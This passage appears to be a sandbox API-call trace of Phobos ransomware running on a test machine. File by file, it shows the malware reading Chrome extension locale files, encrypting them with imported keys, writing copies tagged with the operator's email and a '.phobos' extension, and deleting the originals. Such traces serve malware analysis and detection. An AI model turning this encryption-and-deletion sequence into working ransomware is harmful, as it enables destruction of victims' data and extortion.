lpNumberOfBytesRead=0x2f4fcac*=0xe0, lpOverlapped=0x0) returned 1 [0153.971] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0153.971] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0153.972] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0153.972] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.972] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0153.972] CryptDestroyKey (hKey=0xa32d68) returned 1 [0153.972] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0153.972] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.972] CloseHandle (hObject=0x138) returned 1 [0153.972] CloseHandle (hObject=0x130) returned 1 [0153.972] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js")) returned 1 [0153.973] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.975] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=132) returned 1 [0153.975] CloseHandle (hObject=0x130) returned 1 [0153.975] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json")) returned 0x2020 [0153.975] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.976] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.976] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.976] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.976] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.976] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x84, lpOverlapped=0x0) returned 1 [0153.977] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x90, dwBufLen=0x90 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x90) returned 1 [0153.977] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x90, lpOverlapped=0x0) returned 1 [0153.978] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0153.978] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.978] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.978] CryptDestroyKey (hKey=0xa32d68) returned 1 [0153.978] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.978] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.978] CloseHandle (hObject=0x130) returned 1 [0153.978] CloseHandle (hObject=0x138) returned 1 [0153.979] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json")) returned 1 [0153.979] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.980] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=259) returned 1 [0153.980] CloseHandle (hObject=0x138) returned 1 [0153.980] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json")) returned 0x2020 [0153.980] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.980] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.981] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.981] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.981] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.981] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x103, lpOverlapped=0x0) returned 1 [0153.982] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0153.982] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0153.983] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0153.983] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.983] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.983] CryptDestroyKey (hKey=0xa32d68) returned 1 [0153.983] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.983] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.983] CloseHandle (hObject=0x138) returned 1 [0153.983] CloseHandle (hObject=0x130) returned 1 [0153.983] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json")) returned 1 [0153.984] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.985] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=237) returned 1 [0153.985] CloseHandle (hObject=0x130) returned 1 [0153.985] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json")) returned 0x2020 [0153.985] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.986] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.986] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.986] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.986] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.986] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xed, lpOverlapped=0x0) returned 1 [0153.987] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0153.987] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0153.988] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0153.988] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.988] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.988] CryptDestroyKey (hKey=0xa32d68) returned 1 [0153.988] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.988] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.988] CloseHandle (hObject=0x130) returned 1 [0153.988] CloseHandle (hObject=0x138) returned 1 [0153.989] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json")) returned 1 [0153.990] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.990] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.990] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=167) returned 1 [0153.990] CloseHandle (hObject=0x138) returned 1 [0153.991] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json")) returned 0x2020 [0153.991] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.992] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.993] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.993] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.993] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.993] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xa7, lpOverlapped=0x0) returned 1 [0153.996] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0153.996] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0153.998] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0153.999] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.999] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.999] CryptDestroyKey (hKey=0xa32d68) returned 1 [0153.999] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.999] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.999] CloseHandle (hObject=0x138) returned 1 [0153.999] CloseHandle (hObject=0x130) returned 1 [0153.999] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js 